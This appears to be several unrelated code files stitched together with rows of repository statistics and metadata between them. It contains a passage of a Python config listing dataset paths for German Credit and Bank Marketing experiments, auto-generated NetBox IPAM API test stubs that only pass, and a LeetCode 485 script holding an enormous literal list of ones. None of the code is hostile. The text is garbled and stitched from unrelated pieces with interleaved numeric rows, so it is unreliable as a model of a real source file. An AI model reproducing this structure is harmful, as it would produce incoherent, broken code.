GERMAN_CREDIT_NUMERIC_DATASET_PATH = _here("german_credit", "german.data-numeric")
GERMAN_CREDIT_SAMPLED_DATASET_PATH = _here("german_credit", "sampled_GermanCreditDataset.csv")
# ------------------------------ DEPLOYMENT (SYNTHESIZED) DATA ------------------------------#
GERMAN_CREDIT_DEPLOYMENT_DATASET_PATH = _generated("generated_GermanCreditDataset.csv")
GERMAN_CREDIT_DEPLOYMENT_DATASET_PLUS_PATH = _generated("generated_GermanCreditDataset_plus.csv")
GERMAN_CREDIT_SAMPLED_DEPLOYMENT_DATASET = _generated("generated_sampled_GermanCreditDataset.csv")
# ------------------------------ TRAINING DATA ------------------------------#
GERMAN_CREDIT_TRAINING_PROCESSED_DF_PATH = _preprocessed("GermanCreditDataset.pickle")
GERMAN_CREDIT_TRAINING_PROCESSED_DF_PLUS_PATH = _preprocessed("GermanCreditDatasetPlus.pickle")
GERMAN_CREDIT_TRAINING_FEATURE_METRIC_LIST_PATH = _preprocessed("GermanCreditDataset_FeatureMetricsList.pickle")
GERMAN_CREDIT_RETRAINING_DF = _preprocessed("GermanCreditConcatenatedDataFrame.pickle")
GERMAN_CREDIT_TRAINING_X_TRAIN = _preprocessed("GermanCreditDataset_X_train.pickle")
GERMAN_CREDIT_TRAINING_Y_TRAIN = _preprocessed("GermanCreditDataset_y_train.pickle")
GERMAN_CREDIT_TRAINING_X_VALIDATION = _preprocessed("GermanCreditDataset_X_validation.pickle")
GERMAN_CREDIT_TRAINING_Y_VALIDATION = _preprocessed("GermanCreditDataset_y_validation.pickle")
GERMAN_CREDIT_TRAINING_X_TEST = _preprocessed("GermanCreditDataset_X_test.pickle")
GERMAN_CREDIT_TRAINING_Y_TEST = _preprocessed("GermanCreditDataset_y_test.pickle")
GERMAN_CREDIT_RETRAINING_X_TRAIN = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_X_train.pickle")
GERMAN_CREDIT_RETRAINING_Y_TRAIN = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_y_train.pickle")
GERMAN_CREDIT_RETRAINING_X_VALIDATION = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_X_validation.pickle")
GERMAN_CREDIT_RETRAINING_Y_VALIDATION = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_y_validation.pickle")
GERMAN_CREDIT_RETRAINING_X_TEST = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_X_test.pickle")
GERMAN_CREDIT_RETRAINING_Y_TEST = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_y_test.pickle")
GERMAN_CREDIT_TRAINING_X_TRAIN_RAW = _preprocessed("GermanCreditDataset_X_train_raw.pickle")
GERMAN_CREDIT_TRAINING_Y_TRAIN_RAW = _preprocessed("GermanCreditDataset_y_train_raw.pickle")
GERMAN_CREDIT_TRAINING_X_VALIDATION_RAW = _preprocessed("GermanCreditDataset_X_validation_raw.pickle")
GERMAN_CREDIT_TRAINING_Y_VALIDATION_RAW = _preprocessed("GermanCreditDataset_y_validation_raw.pickle")
GERMAN_CREDIT_TRAINING_X_TEST_RAW = _preprocessed("GermanCreditDataset_X_test_raw.pickle")
GERMAN_CREDIT_TRAINING_Y_TEST_RAW = _preprocessed("GermanCreditDataset_y_test_raw.pickle")
GERMAN_CREDIT_RETRAINING_X_TRAIN_RAW = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_X_train_raw.pickle")
GERMAN_CREDIT_RETRAINING_Y_TRAIN_RAW = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_y_train_raw.pickle")
GERMAN_CREDIT_RETRAINING_X_VALIDATION_RAW = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_X_validation_raw.pickle")
GERMAN_CREDIT_RETRAINING_Y_VALIDATION_RAW = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_y_validation_raw.pickle")
GERMAN_CREDIT_RETRAINING_X_TEST_RAW = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_X_test_raw.pickle")
GERMAN_CREDIT_RETRAINING_Y_TEST_RAW = _preprocessed(_GERMAN_CREDIT_RETRAIN + "_y_test_raw.pickle")
# ------------------------------ Backup and Testing ------------------------------#
# Not-drifted
SMOTENC_GERMAN_CREDIT_DEPLOYMENT_DATASET_PATH_NORMAL = _generated("smotenc_generated_GermanCreditDataset_normal.csv")
SMOTENC_GERMAN_CREDIT_DEPLOYMENT_DATASET_PLUS_PATH_NORMAL = _generated("smotenc_generated_GermanCreditDataset_plus_normal.csv")
GAN_GERMAN_CREDIT_DEPLOYMENT_DATASET_PATH_NORMAL = _generated("gan_generated_GermanCreditDataset_normal.csv")
GAN_GERMAN_CREDIT_DEPLOYMENT_DATASET_PLUS_PATH_NORMAL = _generated("gan_generated_GermanCreditDataset_plus_normal.csv")
# Drifted
SMOTENC_GERMAN_CREDIT_DEPLOYMENT_DATASET_PATH_DRIFT = _generated("smotenc_generated_GermanCreditDataset_drift.csv")
SMOTENC_GERMAN_CREDIT_DEPLOYMENT_DATASET_PLUS_PATH_DRIFT = _generated("smotenc_generated_GermanCreditDataset_plus_drift.csv")
GAN_GERMAN_CREDIT_DEPLOYMENT_DATASET_PATH_DRIFT = _generated("gan_generated_GermanCreditDataset_drift.csv")
GAN_GERMAN_CREDIT_DEPLOYMENT_DATASET_PLUS_PATH_DRIFT = _generated("gan_generated_GermanCreditDataset_plus_drift.csv")
################################################################################
# ------------------------------ BANK MARKETING ------------------------------#
################################################################################
# ------------------------------ RAW DATA ------------------------------#
BANK_MARKETING_DATASET_PATH = _here("bank_marketing", "bank.csv")
BANK_MARKETING_FULL_DATASET_PATH = _here("bank_marketing", "bank-full.csv")
BANK_MARKETING_ADDITIONAL_DATASET_PATH = _here("bank_marketing", "bank-additional.csv")
BANK_MARKETING_ADDITIONAL_FULL_DATASET_PATH = _here("bank_marketing", "bank-additional-full.csv")
BANK_MARKETING_SAMPLED_DATASET_PATH = _here("bank_marketing", "sampled_BankMarketingDataset.csv")
# ------------------------------ DEPLOYMENT (SYNTHESIZED) DATA ------------------------------#
BANK_MARKETING_DEPLOYMENT_DATASET_PATH = _generated("generated_BankMarketingDataset.csv")
BANK_MARKETING_DEPLOYMENT_DATASET_PLUS_PATH = _generated("generated_BankMarketingDataset_plus.csv")
BANK_MARKETING_SAMPLED_DEPLOYMENT_DATASET = _generated("generated_sampled_BankMarketingDataset.csv")
# ------------------------------ TRAINING DATA ------------------------------#
BANK_MARKETING_TRAINING_PROCESSED_DF_PATH = _preprocessed("BankMarketingDataset.pickle")
BANK_MARKETING_TRAINING_PROCESSED_DF_PLUS_PATH = _preprocessed("BankMarketingDatasetPlus.pickle")
BANK_MARKETING_TRAINING_FEATURE_METRIC_LIST_PATH = _preprocessed("BankMarketingDataset_FeatureMetricsList.pickle")
BANK_MARKETING_RETRAINING_DF = _preprocessed("BankMarketingConcatenatedDataFrame.pickle")
BANK_MARKETING_TRAINING_X_TRAIN = _preprocessed("BankMarketingDataset_X_train.pickle")
BANK_MARKETING_TRAINING_Y_TRAIN = _preprocessed("BankMarketingDataset_y_train.pickle")
BANK_MARKETING_TRAINING_X_VALIDATION = _preprocessed("BankMarketingDataset_X_validation.pickle")
BANK_MARKETING_TRAINING_Y_VALIDATION = _preprocessed("BankMarketingDataset_y_validation.pickle")
BANK_MARKETING_TRAINING_X_TEST = _preprocessed("BankMarketingDataset_X_test.pickle")
BANK_MARKETING_TRAINING_Y_TEST = _preprocessed("BankMarketingDataset_y_test.pickle")
BANK_MARKETING_RETRAINING_X_TRAIN = _preprocessed(_BANK_MARKETING_RETRAIN + "_X_train.pickle")
BANK_MARKETING_RETRAINING_Y_TRAIN = _preprocessed(_BANK_MARKETING_RETRAIN + "_y_train.pickle")
BANK_MARKETING_RETRAINING_X_VALIDATION = _preprocessed(_BANK_MARKETING_RETRAIN + "_X_validation.pickle")
BANK_MARKETING_RETRAINING_Y_VALIDATION = _preprocessed(_BANK_MARKETING_RETRAIN + "_y_validation.pickle")
BANK_MARKETING_RETRAINING_X_TEST = _preprocessed(_BANK_MARKETING_RETRAIN + "_X_test.pickle")
BANK_MARKETING_RETRAINING_Y_TEST = _preprocessed(_BANK_MARKETING_RETRAIN + "_y_test.pickle")
BANK_MARKETING_TRAINING_X_TRAIN_RAW = _preprocessed("BankMarketingDataset_X_train_raw.pickle")
BANK_MARKETING_TRAINING_Y_TRAIN_RAW = _preprocessed("BankMarketingDataset_y_train_raw.pickle")
BANK_MARKETING_TRAINING_X_VALIDATION_RAW = _preprocessed("BankMarketingDataset_X_validation_raw.pickle")
BANK_MARKETING_TRAINING_Y_VALIDATION_RAW = _preprocessed("BankMarketingDataset_y_validation_raw.pickle")
BANK_MARKETING_TRAINING_X_TEST_RAW = _preprocessed("BankMarketingDataset_X_test_raw.pickle")
BANK_MARKETING_TRAINING_Y_TEST_RAW = _preprocessed("BankMarketingDataset_y_test_raw.pickle")
BANK_MARKETING_RETRAINING_X_TRAIN_RAW = _preprocessed(_BANK_MARKETING_RETRAIN + "_X_train_raw.pickle")
BANK_MARKETING_RETRAINING_Y_TRAIN_RAW = _preprocessed(_BANK_MARKETING_RETRAIN + "_y_train_raw.pickle")
BANK_MARKETING_RETRAINING_X_VALIDATION_RAW = _preprocessed(_BANK_MARKETING_RETRAIN + "_X_validation_raw.pickle")
BANK_MARKETING_RETRAINING_Y_VALIDATION_RAW = _preprocessed(_BANK_MARKETING_RETRAIN + "_y_validation_raw.pickle")
BANK_MARKETING_RETRAINING_X_TEST_RAW = _preprocessed(_BANK_MARKETING_RETRAIN + "_X_test_raw.pickle")
BANK_MARKETING_RETRAINING_Y_TEST_RAW = _preprocessed(_BANK_MARKETING_RETRAIN + "_y_test_raw.pickle")
# ------------------------------ Backup and Testing ------------------------------#
# Non-Drifted
SMOTENC_BANK_MARKETING_DEPLOYMENT_DATASET_PATH_NORMAL = _generated("smotenc_generated_BankMarketingDataset_normal.csv")
SMOTENC_BANK_MARKETING_DEPLOYMENT_DATASET_PLUS_PATH_NORMAL = _generated("smotenc_generated_BankMarketingDataset_plus_normal.csv")
# FIX: was "gan_generated_BankMarketingDataset.csv_normal" — every sibling
# constant uses the "<stem>_normal.csv" suffix pattern; the ".csv_normal"
# spelling looked like a typo.  Confirm no file on disk carries the old name.
GAN_BANK_MARKETING_DEPLOYMENT_DATASET_PATH_NORMAL = _generated("gan_generated_BankMarketingDataset_normal.csv")
GAN_BANK_MARKETING_DEPLOYMENT_DATASET_PLUS_PATH_NORMAL = _generated("gan_generated_BankMarketingDataset_plus_normal.csv")
# Drifted
SMOTENC_BANK_MARKETING_DEPLOYMENT_DATASET_PATH_DRIFT = _generated("smotenc_generated_BankMarketingDataset_drift.csv")
SMOTENC_BANK_MARKETING_DEPLOYMENT_DATASET_PLUS_PATH_DRIFT = _generated("smotenc_generated_BankMarketingDataset_plus_drift.csv")
GAN_BANK_MARKETING_DEPLOYMENT_DATASET_PATH_DRIFT = _generated("gan_generated_BankMarketingDataset_drift.csv")
GAN_BANK_MARKETING_DEPLOYMENT_DATASET_PLUS_PATH_DRIFT = _generated("gan_generated_BankMarketingDataset_plus_drift.csv")
| 132.204724
| 232
| 0.752889
| 1,824
| 16,790
| 6.336623
| 0.032895
| 0.089289
| 0.09673
| 0.111611
| 0.939436
| 0.929486
| 0.844783
| 0.829988
| 0.825489
| 0.825489
| 0
| 0
| 0.045384
| 16,790
| 126
| 233
| 133.253968
| 0.721113
| 0.049732
| 0
| 0
| 0
| 0
| 0.438117
| 0.292889
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011494
| 0
| 0.011494
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e19aa45383db9286c61545abbf7b844a606dce1
| 7,569
|
py
|
Python
|
test/test_ipam_api.py
|
nrfta/python-netbox-client
|
68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8
|
[
"MIT"
] | null | null | null |
test/test_ipam_api.py
|
nrfta/python-netbox-client
|
68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8
|
[
"MIT"
] | null | null | null |
test/test_ipam_api.py
|
nrfta/python-netbox-client
|
68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
NetBox API
API to access NetBox # noqa: E501
OpenAPI spec version: 2.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import netbox_client
from netbox_client.api.ipam_api import IpamApi # noqa: E501
from netbox_client.rest import ApiException
class TestIpamApi(unittest.TestCase):
"""IpamApi unit test stubs"""
def setUp(self):
self.api = netbox_client.api.ipam_api.IpamApi() # noqa: E501
def tearDown(self):
pass
def test_ipam_aggregates_create(self):
"""Test case for ipam_aggregates_create
"""
pass
def test_ipam_aggregates_delete(self):
"""Test case for ipam_aggregates_delete
"""
pass
def test_ipam_aggregates_list(self):
"""Test case for ipam_aggregates_list
"""
pass
def test_ipam_aggregates_partial_update(self):
"""Test case for ipam_aggregates_partial_update
"""
pass
def test_ipam_aggregates_read(self):
"""Test case for ipam_aggregates_read
"""
pass
def test_ipam_aggregates_update(self):
"""Test case for ipam_aggregates_update
"""
pass
def test_ipam_ip_addresses_create(self):
"""Test case for ipam_ip_addresses_create
"""
pass
def test_ipam_ip_addresses_delete(self):
"""Test case for ipam_ip_addresses_delete
"""
pass
def test_ipam_ip_addresses_list(self):
"""Test case for ipam_ip_addresses_list
"""
pass
def test_ipam_ip_addresses_partial_update(self):
"""Test case for ipam_ip_addresses_partial_update
"""
pass
def test_ipam_ip_addresses_read(self):
"""Test case for ipam_ip_addresses_read
"""
pass
def test_ipam_ip_addresses_update(self):
"""Test case for ipam_ip_addresses_update
"""
pass
def test_ipam_prefixes_available_ips_create(self):
"""Test case for ipam_prefixes_available_ips_create
"""
pass
def test_ipam_prefixes_available_ips_read(self):
"""Test case for ipam_prefixes_available_ips_read
"""
pass
def test_ipam_prefixes_available_prefixes_create(self):
"""Test case for ipam_prefixes_available_prefixes_create
A convenience method for returning available child prefixes within a parent. # noqa: E501
"""
pass
def test_ipam_prefixes_available_prefixes_read(self):
"""Test case for ipam_prefixes_available_prefixes_read
A convenience method for returning available child prefixes within a parent. # noqa: E501
"""
pass
def test_ipam_prefixes_create(self):
"""Test case for ipam_prefixes_create
"""
pass
def test_ipam_prefixes_delete(self):
"""Test case for ipam_prefixes_delete
"""
pass
def test_ipam_prefixes_list(self):
"""Test case for ipam_prefixes_list
"""
pass
def test_ipam_prefixes_partial_update(self):
"""Test case for ipam_prefixes_partial_update
"""
pass
def test_ipam_prefixes_read(self):
"""Test case for ipam_prefixes_read
"""
pass
def test_ipam_prefixes_update(self):
"""Test case for ipam_prefixes_update
"""
pass
def test_ipam_rirs_create(self):
"""Test case for ipam_rirs_create
"""
pass
def test_ipam_rirs_delete(self):
"""Test case for ipam_rirs_delete
"""
pass
def test_ipam_rirs_list(self):
"""Test case for ipam_rirs_list
"""
pass
def test_ipam_rirs_partial_update(self):
"""Test case for ipam_rirs_partial_update
"""
pass
def test_ipam_rirs_read(self):
"""Test case for ipam_rirs_read
"""
pass
def test_ipam_rirs_update(self):
"""Test case for ipam_rirs_update
"""
pass
def test_ipam_roles_create(self):
"""Test case for ipam_roles_create
"""
pass
def test_ipam_roles_delete(self):
"""Test case for ipam_roles_delete
"""
pass
def test_ipam_roles_list(self):
"""Test case for ipam_roles_list
"""
pass
def test_ipam_roles_partial_update(self):
"""Test case for ipam_roles_partial_update
"""
pass
def test_ipam_roles_read(self):
"""Test case for ipam_roles_read
"""
pass
def test_ipam_roles_update(self):
"""Test case for ipam_roles_update
"""
pass
def test_ipam_services_create(self):
"""Test case for ipam_services_create
"""
pass
def test_ipam_services_delete(self):
"""Test case for ipam_services_delete
"""
pass
def test_ipam_services_list(self):
"""Test case for ipam_services_list
"""
pass
def test_ipam_services_partial_update(self):
"""Test case for ipam_services_partial_update
"""
pass
def test_ipam_services_read(self):
"""Test case for ipam_services_read
"""
pass
def test_ipam_services_update(self):
"""Test case for ipam_services_update
"""
pass
def test_ipam_vlan_groups_create(self):
"""Test case for ipam_vlan_groups_create
"""
pass
def test_ipam_vlan_groups_delete(self):
"""Test case for ipam_vlan_groups_delete
"""
pass
def test_ipam_vlan_groups_list(self):
"""Test case for ipam_vlan_groups_list
"""
pass
def test_ipam_vlan_groups_partial_update(self):
"""Test case for ipam_vlan_groups_partial_update
"""
pass
def test_ipam_vlan_groups_read(self):
"""Test case for ipam_vlan_groups_read
"""
pass
def test_ipam_vlan_groups_update(self):
"""Test case for ipam_vlan_groups_update
"""
pass
def test_ipam_vlans_create(self):
"""Test case for ipam_vlans_create
"""
pass
def test_ipam_vlans_delete(self):
"""Test case for ipam_vlans_delete
"""
pass
def test_ipam_vlans_list(self):
"""Test case for ipam_vlans_list
"""
pass
def test_ipam_vlans_partial_update(self):
"""Test case for ipam_vlans_partial_update
"""
pass
def test_ipam_vlans_read(self):
"""Test case for ipam_vlans_read
"""
pass
def test_ipam_vlans_update(self):
"""Test case for ipam_vlans_update
"""
pass
def test_ipam_vrfs_create(self):
"""Test case for ipam_vrfs_create
"""
pass
def test_ipam_vrfs_delete(self):
"""Test case for ipam_vrfs_delete
"""
pass
def test_ipam_vrfs_list(self):
"""Test case for ipam_vrfs_list
"""
pass
def test_ipam_vrfs_partial_update(self):
"""Test case for ipam_vrfs_partial_update
"""
pass
def test_ipam_vrfs_read(self):
"""Test case for ipam_vrfs_read
"""
pass
def test_ipam_vrfs_update(self):
"""Test case for ipam_vrfs_update
"""
pass
# Allow running this test module directly (python test_ipam_api.py); runs all
# TestIpamApi stubs via the unittest CLI.
if __name__ == '__main__':
    unittest.main()
| 19.65974
| 98
| 0.60761
| 920
| 7,569
| 4.6
| 0.079348
| 0.095936
| 0.150756
| 0.205577
| 0.911626
| 0.720463
| 0.373819
| 0.143667
| 0.045369
| 0.045369
| 0
| 0.00347
| 0.314573
| 7,569
| 384
| 99
| 19.710938
| 0.812259
| 0.401903
| 0
| 0.460938
| 1
| 0
| 0.001919
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.46875
| false
| 0.460938
| 0.039063
| 0
| 0.515625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
2e6e434b058ccda61dc7039007cc4b858b9d6577
| 20,436
|
py
|
Python
|
Practice/PythonApplication/LeetCode/Array/485.py
|
kushalbhola/MyStuff
|
3f1064866487e489af41f8662a875b9954d5d8b0
|
[
"Apache-2.0"
] | null | null | null |
Practice/PythonApplication/LeetCode/Array/485.py
|
kushalbhola/MyStuff
|
3f1064866487e489af41f8662a875b9954d5d8b0
|
[
"Apache-2.0"
] | 1
|
2020-04-29T23:00:26.000Z
|
2020-04-29T23:00:26.000Z
|
Practice/PythonApplication/LeetCode/Array/485.py
|
kushalbhola/MyStuff
|
3f1064866487e489af41f8662a875b9954d5d8b0
|
[
"Apache-2.0"
] | null | null | null |
def main():
input = [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1